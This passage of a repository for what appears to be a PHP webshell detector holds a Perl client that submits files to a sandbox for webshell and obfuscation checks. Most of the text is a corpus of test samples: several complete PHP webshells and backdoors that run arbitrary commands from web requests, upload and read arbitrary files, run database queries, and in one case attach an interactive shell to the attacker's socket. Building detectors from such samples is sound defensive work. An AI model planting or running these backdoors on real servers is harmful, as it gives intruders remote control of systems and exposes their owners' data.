59 | <font face="courier new" size="2" color="777777">cmd : 
60 | <INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
61 | <br>
62 | <INPUT TYPE="submit">
63 | </font></FORM>
64 | 
65 | <hr color=777777 width=100% height=115px>
66 | 
67 | <pre>
68 | <?
69 | $cmd = $_POST['cmd'];
70 |   if (isset($chdir)) @chdir($chdir);
71 |   ob_start();
72 |   system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
73 |   $output = ob_get_contents();
74 |   ob_end_clean();
75 |   if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
76 | exit;
77 | ?>
78 | </pre>
79 | 


--------------------------------------------------------------------------------
/t/malware/42.php:
--------------------------------------------------------------------------------
 1 | <title>h4ntu shell [powered by tsoi]</title>
 2 | <?php
 3 | echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
 4 | ?>
 5 | 
 6 | <?php
 7 |   closelog( );
 8 |   $user = get_current_user( );
 9 |   $login = posix_getuid( );
10 |   $euid = posix_geteuid( );
11 |   $ver = phpversion( );
12 |   $gid = posix_getgid( );
13 |   if ($chdir == "") $chdir = getcwd( );
14 |   if(!$whoami)$whoami=exec("whoami");
15 | ?>
16 | <meta name="generator" content="Namo WebEditor v5.0">
17 | <br>
18 | <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
19 | <?php
20 |   $uname = posix_uname( );
21 |   while (list($info, $value) = each ($uname)) {
22 | ?>
23 |   <TR>
24 |     <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
25 |   </TR>
26 | <?php
27 |   }
28 | ?>
29 |   <TR>
30 | 
31 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
32 |   </TR>
33 |   <TR>
34 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
35 | 
36 |   </TR>
37 |   <TR>
38 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
39 |   </TR>  
40 |   <TR>
41 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
42 |   </TR>
43 | 
44 |   <TR>
45 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
46 |   </TR>
47 |   <TR>
48 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
49 |   </TR>
50 |   <TR>
51 | 
52 |   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
53 |   </TR>
54 | </TABLE>
55 | <BR>
56 | 
57 | <font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
58 | </font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
59 | <font face="courier new" size="2" color="777777">cmd : 
60 | <INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
61 | <br>
62 | <INPUT TYPE="submit">
63 | </font></FORM>
64 | 
65 | <hr color=777777 width=100% height=115px>
66 | 
67 | <pre>
68 | <?
69 | $cmd = $_POST['cmd'];
70 |   if (isset($chdir)) @chdir($chdir);
71 |   ob_start();
72 |   system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
73 |   $output = ob_get_contents();
74 |   ob_end_clean();
75 |   if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
76 | exit;
77 | ?>
78 | </pre>
79 | 


--------------------------------------------------------------------------------
/t/malware/118.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | set_magic_quotes_runtime(0);
 4 | 
 5 | print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
 6 | print "<center><h1>#worst @dal.net</h1></center>";
 7 | print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
 8 | print "<center><h1>Watch Your system Shany was here.</h1></center>";
 9 | print "<center><h1>Linux Shells</h1></center>";
10 | print "<hr><hr>";
11 | 
12 | $currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
13 | $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
14 | 
15 | $UName  = `uname -a`;
16 | $SCWD   = `pwd`;
17 | $UserID = `id`;
18 | 
19 | if( $currentWD == "" ) {
20 |     $currentWD = $SCWD;
21 | }
22 | 
23 | print "<table>";
24 | print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
25 | print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
26 | print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
27 | print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
28 | print "</table>";
29 | 
30 | print "<hr><hr>";
31 | 
32 | if( $_POST['_act'] == "List files!" ) {
33 |     $currentCMD = "ls -la";
34 | }
35 | 
36 | print "<form method=post enctype=\"multipart/form-data\"><table>";
37 | 
38 | print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
39 | print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
40 | 
41 | print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
42 | print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
43 | 
44 | print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
45 | print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
46 | 
47 | print "</table></form><hr><hr>";
48 | 
49 | $currentCMD = str_replace("\\\"","\"",$currentCMD);
50 | $currentCMD = str_replace("\\\'","\'",$currentCMD);
51 | 
52 | if( $_POST['_act'] == "Upload!" ) {
53 |     if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
54 |         print "<center><b>Error while uploading file!</b></center>";
55 |     } else {
56 |         print "<center><pre>";
57 |         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
58 |         print "</pre><b>File uploaded successfully!</b></center>";
59 |     }    
60 | } else {
61 |     print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
62 |     $currentCMD = "cd ".$currentWD.";".$currentCMD;
63 |     system($currentCMD);
64 |     print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
65 | }
66 | 
67 | exit;
68 | 
69 | ?>
70 | 


--------------------------------------------------------------------------------
/t/malware/51.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | if($_POST['dir'] == "") {
 3 | 
 4 |  $curdir = `pwd`;
 5 | } else {
 6 |  $curdir = $_POST['dir'];
 7 | }
 8 | 
 9 | if($_POST['king'] == "") {
10 | 
11 |  $curcmd = "ls -lah";
12 | } else {
13 |  $curcmd = $_POST['king'];
14 | }
15 | 
16 | 
17 | ?>
18 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
19 |                         "http://www.w3.org/TR/html4/loose.dtd">
20 | <html>
21 |   <head>
22 |     <title>lama's'hell v. 3.0</title>
23 |     <style type="text/css">
24 |      body {
25 |       color: white; background-color: black;
26 |       font-size: 12px;
27 |       font-family: Helvetica,Arial,Sans-Serif;
28 |      }
29 |     </style>
30 |   </head>
31 |   <body>
32 |     <pre>
33 |                               _           _
34 |                              / \_______ /|_\
35 |                             /          /_/ \__
36 |                            /             \_/ /
37 |                          _|_              |/|_
38 |                          _|_  O    _    O  _|_
39 |                          _|_      (_)      _|_
40 |                           \                 /
41 |                            _\_____________/_
42 |                           /  \/  (___)  \/  \
43 |                           \__(  o     o  )__/ <?
44 | $ob = @ini_get("open_basedir");
45 | $df = @ini_get("disable_functions");
46 | if( ini_get('safe_mode') ) {
47 |    echo "SM: 1 \\ ";
48 | } else {
49 |    echo "SM: 0 \\ ";
50 | }
51 | if(''==$df) {
52 |    echo "DF: 0 \\ ";
53 | } else {
54 |    echo "DF: ".$df." \\ ";
55 | }
56 | echo "".php_uname()."\n";
57 | ?>
58 | <hr></pre>
59 |     <table><form method="post" enctype="multipart/form-data">
60 |       <tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td>
61 |       <tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td>
62 |       <td><input name="exe" type="submit" value="Execute"></td></tr>
63 | 
64 |       <tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
65 |       <td><input name="upl" type="submit" value="Upload"></td></tr>
66 |     </form></table>
67 | <pre><hr>
68 | <?
69 |     if(($_POST['upl']) == "Upload" ) {
70 |     if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) {
71 |         echo "The file has been uploaded<br><br>";
72 |     } else {
73 |         echo "There was an error uploading the file, please try again!";
74 |     }
75 |     }
76 |     if(($_POST['exe']) == "Execute") {
77 |      $curcmd = "cd ".$curdir.";".$curcmd;
78 |      $f=popen($curcmd,"r");
79 |      while (!feof($f)) {
80 |       $buffer = fgets($f, 4096);
81 |       $string .= $buffer;
82 |      }
83 |      pclose($f);
84 |      echo htmlspecialchars($string);
85 |     }
86 | ?>
87 |     </pre>
88 |   </body>
89 | </html>
90 | 


--------------------------------------------------------------------------------
/t/malware/77.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
 3 | 
 4 | ob_implicit_flush();
 5 | if(isset($_REQUEST['f'])){
 6 |         $filename=$_REQUEST['f'];
 7 |         $file=fopen("$filename","rb");
 8 |         fpassthru($file);
 9 |         die;
10 | }
11 | if(isset($_REQUEST['d'])){
12 |         $d=$_REQUEST['d'];
13 |         echo "<pre>";
14 |         if ($handle = opendir("$d")) {
15 |         echo "<h2>listing of $d</h2>";
16 |                    while ($dir = readdir($handle)){ 
17 |                        if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
18 | 							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
19 |                        echo "$dir\n"; 
20 |                        echo "</font></a>";
21 |                 }
22 |                        
23 |         } else echo "opendir() failed";
24 |         closedir($handle);
25 |         die ("<hr>"); 
26 | }
27 | if(isset($_REQUEST['c'])){
28 | 	echo "<pre>";
29 | 	system($_REQUEST['c']);		   
30 | 	die;
31 | }
32 | if(isset($_REQUEST['upload'])){
33 | 
34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
35 | 			else $dir=$_REQUEST['dir'];
36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
38 | 			die('file uploading error.');
39 | }
40 | if(isset($_REQUEST['mquery'])){
41 | 	
42 | 	$host=$_REQUEST['host'];
43 | 	$usr=$_REQUEST['usr'];
44 | 	$passwd=$_REQUEST['passwd'];
45 | 	$db=$_REQUEST['db'];
46 | 	$mquery=$_REQUEST['mquery'];
47 | 	mysql_connect("$host", "$usr", "$passwd") or
48 |     die("Could not connect: " . mysql_error());
49 |     mysql_select_db("$db");
50 |     $result = mysql_query("$mquery");
51 | 	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
52 |     while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
53 |     mysql_free_result($result);
54 | 	die;
55 | }
56 | ?>
57 | <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
58 | <form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
59 | upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
60 | <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
61 | <br>for example:
62 | http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
63 | or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
64 | <hr>execute mysql query:
65 | <form action="<? echo $PHP_SELF; ?>" METHOD=GET >
66 | host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
67 | 
68 | database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
69 | </form>
70 | 
71 | <!--	http://michaeldaw.org	2006 	-->
72 | 


--------------------------------------------------------------------------------
/t/malware/78.php:
--------------------------------------------------------------------------------
 1 | <?php 
 2 | // php-findsock-shell - A Findsock Shell implementation in PHP + C
 3 | // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
 4 | //
 5 | // This tool may be used for legal purposes only.  Users take full responsibility
 6 | // for any actions performed using this tool.  The author accepts no liability
 7 | // for damage caused by this tool.  If these terms are not acceptable to you, then
 8 | // do not use this tool.
 9 | //
10 | // In all other respects the GPL version 2 applies:
11 | //
12 | // This program is free software; you can redistribute it and/or modify
13 | // it under the terms of the GNU General Public License version 2 as
14 | // published by the Free Software Foundation.
15 | //
16 | // This program is distributed in the hope that it will be useful,
17 | // but WITHOUT ANY WARRANTY; without even the implied warranty of
18 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
19 | // GNU General Public License for more details.
20 | //
21 | // You should have received a copy of the GNU General Public License along
22 | // with this program; if not, write to the Free Software Foundation, Inc.,
23 | // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
24 | //
25 | // You are encouraged to send comments, improvements or suggestions to
26 | // me at pentestmonkey@pentestmonkey.net
27 | //
28 | // Description
29 | // -----------
30 | // (Pair of) Web server scripts that find the TCP socket being used by the 
31 | // client to connect to the web server and attaches a shell to it.  This 
32 | // provides you, the pentester, with a fully interactive shell even if the 
33 | // Firewall is performing proper ingress and egress filtering.
34 | //
35 | // Proper interactive shells are more useful than web-based shell in some
36 | // circumstances, e.g:
37 | //  1: You want to change your user with "su"
38 | //  2: You want to upgrade your shell using a local exploit
39 | //  3: You want to log into another system using telnet / ssh
40 | //
41 | // Limitations
42 | // -----------
43 | // The shell traffic doesn't look much like HTTP, so I guess that you may
44 | // have problems if the site is being protected by a Layer 7 (Application layer) 
45 | // Firewall.
46 | //
47 | // The shell isn't fully implemented in PHP: you also need to upload a
48 | // C program.  You need to either:
49 | //  1: Compile the program for the appropriate OS / architecture then
50 | //     upload it; or
51 | //  2: Upload the source and hope there's a C compiler installed.
52 | //
53 | // This is a pain, but I couldn't figure out how to implement the findsock
54 | // mechanism in PHP.  Email me if you manage it.  I'd love to know.
55 | //
56 | // Only tested on x86 / amd64 Gentoo Linux.
57 | //
58 | // Usage
59 | // -----
60 | // See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck.
61 | //
62 | // Here are some brief instructions.
63 | //
64 | // 1: Compile findsock.c for use on the target web server:
65 | //    $ gcc -o findsock findsock.c
66 | //
67 | //    Bear in mind that the web server might be running a different OS / architecture to you.
68 | //
69 | // 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using
70 | //    whichever upload vulnerability you've indentified.  Both should be uploaded to the 
71 | //    same directory.
72 | //
73 | // 3: Run the shell from a netcat session (NOT a browser - remember this is an
74 | //    interactive shell).
75 | //
76 | //    $ nc -v target 80
77 | //    target [10.0.0.1] 80 (http) open
78 | //    GET /php-findsock-shell.php HTTP/1.0
79 | //
80 | //    sh-3.2$ id
81 | //    uid=80(apache) gid=80(apache) groups=80(apache)
82 | //    sh-3.2$
83 | //    ... you now have an interactive shell ...
84 | //
85 | 
86 | $VERSION = "1.0";
87 | system( "./findsock " . $_SERVER['REMOTE_ADDR'] . " " . $_SERVER['REMOTE_PORT'] ) 
88 | ?>
89 | 
90 | 


--------------------------------------------------------------------------------
/client/obscan.pl:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env perl
  2 | use strict;
  3 | use warnings;
  4 | use YAML;
  5 | use HTTP::Request::Common;
  6 | use LWP::UserAgent;
  7 | use Getopt::Long qw(:config posix_default no_ignore_case gnu_compat);
  8 | use File::Spec;
  9 | use JSON qw(encode_json decode_json);
 10 | use FindBin qw($Bin);
 11 | use lib "$Bin/../lib";
 12 | use K0U5UK3::Error qw($DEBUG $WARNING debug warning critical);
 13 | use K0U5UK3::Util qw(get_md5);
 14 | use Data::Dumper;
 15 | 
 16 | our $YAML = YAML::LoadFile("$Bin/../settings.yaml");
 17 | 
 18 | #------------#
 19 | # SUB ROUTIN #
 20 | #------------#
 21 | sub usage{
 22 |    printf("Usage : %s -f filename -m detect-obfuscate|detect-webshell|deobfuscate|tracelog|viewfunc\n", $0); 
 23 |    exit(0);
 24 | }
 25 | 
 26 | #-------------#
 27 | # MAIN ROUTIN #
 28 | #-------------#
 29 | 
 30 | # オプション解析
 31 | my %opts;
 32 | GetOptions(\%opts, qw ( 
 33 |    filename|f=s
 34 |    mode|m=s
 35 | ));
 36 | 
 37 | if(! exists $opts{filename}){
 38 |    #filenameオプションが渡っていないならusageを表示して終了
 39 |    usage();
 40 | }
 41 | 
 42 | if(! exists $opts{mode}){
 43 |    #modeオプションが渡っていないならdetectに設定する
 44 |    $opts{mode} = 'detect-webshell';
 45 | }
 46 | 
 47 | # オプションから必要な変数を作成する。
 48 | my $target_file = $opts{filename};
 49 | my $abs_filename = File::Spec->rel2abs("$opts{filename}");
 50 | my $target_md5  = get_md5($target_file);
 51 | my $sandbox_uri;
 52 | 
 53 | # ブラウザの作成
 54 | my $ua = LWP::UserAgent->new;
 55 | $ua->timeout($YAML->{CLIENT_UA_TIMEOUT});
 56 | 
 57 | # HTTP_ENGINEとSSL状況によりsandbox_uriを切り替える
 58 | if($YAML->{SANDBOX_HTTPD_ENGINE} eq 'APACHE'){
 59 |    if($YAML->{USE_SSL}){
 60 |       $sandbox_uri = "https://".$YAML->{SANDBOX_HOST}.":".$YAML->{SANDBOX_PORT}."/sandbox/";
 61 |       $ua->ssl_opts( verify_hostname => 0 );
 62 |    }else{
 63 |       $sandbox_uri = "http://".$YAML->{SANDBOX_HOST}.":".$YAML->{SANDBOX_PORT}."/sandbox/";
 64 |    }
 65 | }else{
 66 |    if($YAML->{USE_SSL}){
 67 |       $sandbox_uri = "https://".$YAML->{SANDBOX_HOST}.":".$YAML->{SANDBOX_PORT};
 68 |       $ua->ssl_opts( verify_hostname => 0 );
 69 |    }else{
 70 |       $sandbox_uri = "http://".$YAML->{SANDBOX_HOST}.":".$YAML->{SANDBOX_PORT};
 71 |    }
 72 | }
 73 | 
 74 | # POSTリクエストを作成する
 75 | my $request = POST(
 76 |    $sandbox_uri,
 77 |    Content_Type => 'form-data',
 78 |    Content => {
 79 |       md5  => get_md5($target_file),
 80 |       mode => "$opts{mode}",
 81 |       data => [ $target_file ],
 82 |    },
 83 | );
 84 | 
 85 | # POSTリクエストを作成し、レスポンスを得る。
 86 | my $response = $ua->request( $request );
 87 | 
 88 | # ERROR処理
 89 | unless($response->is_success){
 90 |    my $code = $response->code;
 91 |    critical "$abs_filename: [$code] ".$response->content;
 92 | }
 93 | 
 94 | # 以降はSANDBOXから正常なレスポンスを受け取ったとみなす。
 95 | my $result = decode_json($response->content);
 96 | 
 97 | # [viewfunc]は呼ばれた関数の一覧とその回数を出力する
 98 | if($result->{mode} eq 'viewfunc'){
 99 |    print "TARGET FILE [ $abs_filename ]\n";
100 |    foreach my $key (sort {$b cmp $a} keys %{$result->{body}}){
101 |       print "$key".'('.$result->{body}->{$key}.')'."\n";
102 |    }
103 | }
104 | 
105 | # [tracelog]はxdebugにより取得されたtracelogをそのまま返す 
106 | if($result->{mode} eq 'tracelog'){
107 |    print "TARGET FILE [ $abs_filename ]\n";
108 |    print $result->{body};
109 | }
110 | 
111 | # [detect-obfuscate]は難読化されたファイルか否かを判定し、結果を返す
112 | if($result->{mode} eq 'detect-obfuscate'){
113 |    print "TARGET FILE [ $abs_filename ] $result->{body}\n";
114 | }
115 | 
116 | # [deobfuscate]は再評価処理に渡された引数を全て返す
117 | if($result->{mode} eq 'deobfuscate'){
118 |    my @deobfuscate = @{$result->{body}};
119 |    my $i=0;
120 |    foreach my $deobfuscate (@deobfuscate){
121 |       next unless defined $deobfuscate;
122 |       printf("/*** [OPWD STEP %0d]***/\n", $i);
123 |       print $deobfuscate . "\n";
124 |       $i++;
125 |    }
126 | }
127 | 
128 | # [detect-webshell]は難読化されたwebshellか否かを判定し、結果を返す。
129 | if($result->{mode} eq 'detect-webshell'){
130 |    print "TARGET FILE [ $abs_filename ] $result->{body}\n";
131 | }
132 | 
133 | exit;
134 | 


--------------------------------------------------------------------------------
/t/malware/58.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | define('PHPSHELL_VERSION', '1.7');
  4 | 
  5 | ?>
  6 | 
  7 | <html>
  8 | <head>
  9 | <title> Matamu Mat </title>
 10 | </head>
 11 | <body>
 12 | <hr><br>
 13 | 
 14 | <?php
 15 | 
 16 | if (ini_get('register_globals') != '1') {
 17 |   /* We'll register the variables as globals: */
 18 |   if (!empty($HTTP_POST_VARS))
 19 |     extract($HTTP_POST_VARS);
 20 |   
 21 |   if (!empty($HTTP_GET_VARS))
 22 |     extract($HTTP_GET_VARS);
 23 | 
 24 |   if (!empty($HTTP_SERVER_VARS))
 25 |     extract($HTTP_SERVER_VARS);
 26 | }
 27 | 
 28 | /* First we check if there has been asked for a working directory. */
 29 | if (!empty($work_dir)) {
 30 |   /* A workdir has been asked for */
 31 |   if (!empty($command)) {
 32 |     if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
 33 |       /* We try and match a cd command. */
 34 |       if ($regs[1][0] == '/') {
 35 |         $new_dir = $regs[1]; // 'cd /something/...'
 36 |       } else {
 37 |         $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
 38 |       }
 39 |       if (file_exists($new_dir) && is_dir($new_dir)) {
 40 |         $work_dir = $new_dir;
 41 |       }
 42 |       unset($command);
 43 |     }
 44 |   }
 45 | }
 46 | 
 47 | if (file_exists($work_dir) && is_dir($work_dir)) {
 48 |   /* We change directory to that dir: */
 49 |   chdir($work_dir);
 50 | }
 51 | 
 52 | /* We now update $work_dir to avoid things like '/foo/../bar': */
 53 | $work_dir = exec('pwd');
 54 | 
 55 | ?>
 56 | 
 57 | <form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
 58 | <p>Current working directory: <b>
 59 | <?php
 60 | 
 61 | $work_dir_splitted = explode('/', substr($work_dir, 1));
 62 | 
 63 | echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
 64 | 
 65 | if (!empty($work_dir_splitted[0])) {
 66 |   $path = '';
 67 |   for ($i = 0; $i < count($work_dir_splitted); $i++) {
 68 |     $path .= '/' . $work_dir_splitted[$i];
 69 |     printf('<a href="%s?work_dir=%s">%s</a>/',
 70 |            $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
 71 |   }
 72 | }
 73 | 
 74 | ?></b></p>
 75 | <p>Choose new working directory:
 76 | <select name="work_dir" onChange="this.form.submit()">
 77 | <?php
 78 | /* Now we make a list of the directories. */
 79 | $dir_handle = opendir($work_dir);
 80 | /* Run through all the files and directories to find the dirs. */
 81 | while ($dir = readdir($dir_handle)) {
 82 |   if (is_dir($dir)) {
 83 |     if ($dir == '.') {
 84 |       echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
 85 |     } elseif ($dir == '..') {
 86 |       /* We have found the parent dir. We must be carefull if the parent 
 87 | 	 directory is the root directory (/). */
 88 |       if (strlen($work_dir) == 1) {
 89 | 	/* work_dir is only 1 charecter - it can only be / There's no
 90 |           parent directory then. */
 91 |       } elseif (strrpos($work_dir, '/') == 0) {
 92 | 	/* The last / in work_dir were the first charecter.
 93 | 	   This means that we have a top-level directory
 94 | 	   eg. /bin or /home etc... */
 95 |       echo "<option value=\"/\">Parent Directory</option>\n";
 96 |       } else {
 97 |       /* We do a little bit of string-manipulation to find the parent
 98 | 	 directory... Trust me - it works :-) */
 99 |       echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
100 |       }
101 |     } else {
102 |       if ($work_dir == '/') {
103 | 	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
104 |       } else {
105 | 	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
106 |       }
107 |     }
108 |   }
109 | }
110 | closedir($dir_handle);
111 | 
112 | ?>
113 | 
114 | </select></p>
115 | 
116 | <p>Command: <input type="text" name="command" size="60">
117 | <input name="submit_btn" type="submit" value="Execute Command"></p>
118 | 
119 | <p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
120 | <textarea cols="80" rows="20" readonly>
121 | 
122 | <?php
123 | if (!empty($command)) {
124 |   if ($stderr) {
125 |     $tmpfile = tempnam('/tmp', 'phpshell');
126 |     $command .= " 1> $tmpfile 2>&1; " .
127 |     "cat $tmpfile; rm $tmpfile";
128 |   } else if ($command == 'ls') {
129 |     /* ls looks much better with ' -F', IMHO. */
130 |     $command .= ' -F';
131 |   }
132 |   system($command);
133 | }
134 | ?>
135 | 
136 | </textarea>
137 | </form>
138 | 
139 | <script language="JavaScript" type="text/javascript">
140 | document.forms[0].command.focus();
141 | </script>
142 | 
143 | <hr>
144 | 
145 | </body>
146 | </html>
147 | 


--------------------------------------------------------------------------------
/t/malware/117.php:
--------------------------------------------------------------------------------
  1 | <html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
  2 | <body bgcolor="#FFFFFF" text="#000000" link="#0066FF" vlink="#0066FF" alink="#0066FF">
  3 | <?php
  4 | 
  5 | // -----:[ Start infomation ]:-----
  6 | // It's simple shell for all Win OS.
  7 | // Created by greenwood from n57
  8 | //
  9 | // ------:[ End infomation]:-------
 10 | 
 11 | 
 12 | set_magic_quotes_runtime(0);
 13 | //*Variables*
 14 | 
 15 | //-------------------------------
 16 | 
 17 | $veros = `ver`;
 18 | $host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
 19 | $windir = `echo %windir%`;
 20 | 
 21 | 
 22 | //------------------------------
 23 |    if( $cmd == "" ) {
 24 |     $cmd = 'dir /OG /X';
 25 |   }
 26 | //-------------------------------
 27 | 
 28 | 
 29 | //------------------------------
 30 | 
 31 | print "<table  style=\"font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9px; border: 1px #000000 dotted\"  border=\"0\" cellspacing=\"1\" cellpadding=\"2\"  >";
 32 | print    "<tr>";
 33 | print      "<td><font color=\"#990000\">You:</font></td>" ;
 34 | print      "<td> ".$_SERVER['REMOTE_ADDR']." [<font color=\"#0033CC\">".$host."</font>] </td>" ;
 35 | print    "</tr>";
 36 | print    "<tr>";
 37 | print      "<td><font color=\"red\">Version OS:</font></td>" ;
 38 | print      "<td><font color=\"#0066CC\"> $veros </font></td>";
 39 | print    "</tr>";
 40 | print    "<tr>";
 41 | print     "<td><font color=\"#990000\">Server:</font></td>";
 42 | print      "<td><font color=\"#0066CC\">".$_SERVER['SERVER_SIGNATURE']."</font></td>";
 43 | print    "</tr>";
 44 | print    "<tr>";
 45 | print     "<td><font color=\"#990000\">Win Dir:</font></td>";
 46 | print      "<td><font color=\"#0066CC\"> $windir </font></td>";
 47 | print    "</tr>";
 48 | print  "</table>";
 49 | print  "<br>";
 50 | 
 51 | //------- [netstat -an] and [ipconfig] and [tasklist] ------------
 52 | print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
 53 | print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"netstat -an\">";
 54 | print "&nbsp;&nbsp;&nbsp;";
 55 | print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"ipconfig\">";
 56 | print "&nbsp;&nbsp;&nbsp;";
 57 | print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"tasklist\">";
 58 | print "</form>";
 59 | //-------------------------------
 60 | 
 61 | 
 62 | //-------------------------------
 63 | 
 64 | print "<textarea style=\"width:100%; height:50% ;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" readonly>";
 65 |        system($cmd);
 66 | print "</textarea>";
 67 | print "<br>";
 68 | 
 69 | //-------------------------------
 70 | 
 71 | print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
 72 | print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">CMD: </font>";
 73 | print "<br>";
